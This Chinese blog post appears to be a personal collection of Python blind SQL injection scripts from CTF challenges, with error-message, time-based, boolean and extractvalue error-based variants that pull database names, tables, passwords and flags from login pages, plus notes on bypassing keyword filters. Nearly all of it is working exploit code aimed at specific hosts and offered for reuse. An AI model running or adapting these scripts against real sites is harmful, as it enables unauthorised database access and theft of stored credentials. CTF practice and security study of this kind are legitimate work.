blind_SQL_injection script

就是突然觉得收集一些脚本,而不是丢掉,这样会让自己做题效率高很多,所以把作过的题目的脚本都收集起来吧。

简单的盲注脚本,根据错误信息判断

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#coding:utf-8
import requests
url = 'http://58.154.33.13:8002/login.php'
payloads='1234567890qwertyuiopasdfghjklzxcvbnm_@QWERTYUIOPASDFGHJKLZXCVBNM,*'
def exp(i,x):
	#xx= "' or if(substring((select database()) from %s for 1)='%s',0,1) and '1'='1"
	#xx = "' or if(substring((select group_concat(table_name) from information_schema.columns where table_schema=database()) from %s for 1)='%s',0,1) and '1'='1"
	#xx = "' or if(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='admin') from %s for 1)='%s',0,1) and '1'='1"
	xx = "' or if(substring((select group_concat(password) from admin) from %s for 1)='%s',0,1) and '1'='1"
	data={'username':xx %(i,x),'password':'123'} 
	response = requests.post(url,data = data)
	if response.content.find('用户名错误')>0:
		return 1
	else :
		return 0
ans=''
print 'star'
for i in range(1,100):
	for x in payloads:
		if exp(i,x)==1:
			ans+=x
			print ans
			break
	if x=='*':
        print "over"
        break

如果改成基于时间的盲注的话,则只需将上方的exp改成如下

1
2
3
4
5
6
7
8
9
10
11
def exp(i,x):
	first_time=time.time()
	xx="' or if(substring((select database()) from %s for 1)='%s',sleep(5),0)"
	data={'username':xx %(i,x),'password':'123'} 
	#print data
	response = requests.post(url,data = data)
	next_time=time.time()
	if (next_time-first_time) > 4:
		return 1
	else :
		return 0

或者

1
2
3
4
5
6
7
8
9
10
11
12
13
14
def exp(i,x):
    #xx = "' or if(substring((select database()) from %s for 1)='%s',benchmark(10000000,md5('test')),0) and '1'='1"
    #xx = "' or if(substring((select group_concat(table_name) from information_schema.columns where table_schema=database()) from %s for 1)='%s',benchmark(10000000,md5('test')),0) and '1'='1"
    #xx = "' or if(substring((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users233')  from %s for 1)='%s',benchmark(10000000,md5('test')),0) and '1'='1"
    xx = "' or if(substring((select group_concat(p4sswo3d) from users233) from %s for 1)='%s',benchmark(10000000,md5('test')),0) and '1'='1"
    data={'id':xx %(i,x)}
    first_time=time.time()
    response = requests.post(url,data = data)
    next_time=time.time()
    if (next_time-first_time) > 2:
        return 1
    else :
        return 0

布尔语句的盲注脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
import requests
url = "http://218.76.35.74:20130/login.php"
unameq = "admin'-(ascii(substr((select(group_concat(passwd))from(admin))from("
password = ''
for i in range(1,50):
    for j in range(1,128):
        uname = unameq+str(i)+")))="+str(j)+")-'-1"
        data = {'uname':uname,'passwd':'123'}
        r = requests.post(url=url, data=data)
        if 'password' in r.text:
            password+=chr(j)
            print(password)
            break
        if j==127:
            print("完成!")
            exit(0)

条件:

  1. 密码错误或者用户名错误返回信息
  2. 过滤了,,|,&,and,or,union,like,*, (所有空白符)等

这里发现了mysql一个神奇的地方,就是字符串在进行运算的时候,会和php一样自动变成数字,比如’admin’-‘-1’的结果会是1,详情参考php,而且我还去试了下把username这一元素改成int类型,发现还是一样的结果

猜测后台脚本应该是先判断用户名,再判断密码。所以上面这个脚本如果命中的话,查询结果会把所有不以数字开头的用户名都返回,然后返回密码错误。如果没命中的话,就会返回用户名错误

第三届上海大学生网络安全赛盲注题

payload如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
#coding:utf-8
import requests
import urllib
def exp(i,x):
	url = 'http://0d2c92830f414f70ae4739aa450aec00fd79f6f552734def.game.ichunqiu.com/index.php?id='
	#xx= "1+%26%26+ascii(substring((select+database())+from+"+str(i)+"+for+1))-"+str(x)
	#xx = "1+%26%26+ascii(substring((select+table_name+from+information_schema.columns+where+table_schema+like+database()+limit+1)+from+"+str(i)+"+for+1))-"+str(x)
	#xx = "1+%26%26+ascii(substring((select+column_name+from+information_schema.columns+where+table_name+like+%22f14g%22+limit+1)+from+"+str(i)+"+for+1))-"+str(x)
	xx = "1+%26%26+ascii(substring((select+f14g+from+words.f14g)+from+"+str(i)+"+for+1))-"+str(x)
	u=url+xx
	#print u
	response = requests.get(url=u)
	#print response.content
	if response.content.find('Hello Hacker!!')>0:
	return 0
	else :
	return 1
ans=''
print 'star'
for i in range(1,100):
	for x in range(32,127):
		if exp(i,x)==1:
			ans+=chr(x)
			print ans
			break

过滤了and=and&&来代替,=like来代替

上面这题也可以用报错注入来做,脚本如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests  
flag=''  
for i in range (50):  
# url =
"http://57b8a27f43c6473f91026a50a1ab287f41ab53c0f5144744.game.ichunqiu.c
om/index.php?id=extractvalue(1,%20concat(0x3a,(select%20schema_name from
information_schema.schemata limit {},1)))".format(i)  
# url =
"http://57b8a27f43c6473f91026a50a1ab287f41ab53c0f5144744.game.ichunqiu.c
om/index.php?id=extractvalue(1,%20concat(0x3a,
(select%20table_name%20from%20information_schema.tables%20where%20tab
le_schema like 0x776f726473%20limit%20{},1)))".format(i)  
# url =
"http://57b8a27f43c6473f91026a50a1ab287f41ab53c0f5144744.game.ichunqiu.c
om/index.php?id=extractvalue(1,%20concat(0x3a,
(select%20column_name%20from%20information_schema.columns%20where%
20table_name like 0x66313467 limit%20{},1)))".format(i)  
url =
"http://57b8a27f43c6473f91026a50a1ab287f41ab53c0f5144744.game.ichunqiu.c
om/index.php?id=extractvalue(1,%20concat(0x3a,(select
substring((select%20f14g from f14g),{},1))))".format(i)  
flag = flag+requests.get(url).content.split(':')[2].replace('\'','')  
print flag


以上就是一些没有过滤的时候的盲注脚本,以后会陆续添加有一些过滤的脚本

×

纯属好玩

扫码支持
扫码打赏,你说多少就多少

打开支付宝扫一扫,即可进行扫码打赏哦

本文标题:blind_SQL_injection script

文章作者:Err0rzz

发布时间:2017年08月25日 - 19时22分

最后更新:2018年03月09日 - 22时45分

原始链接:http://Err0rzz.github.io/2017/08/25/blind-SQL-injection-script/

许可协议: "署名-非商用-相同方式共享 3.0" 转载请保留原文链接及作者。

文章目录
  1. 1. 简单的盲注脚本,根据错误信息判断
  2. 2. 布尔语句的盲注脚本
  3. 3. 第三届上海大学生网络安全赛盲注题
,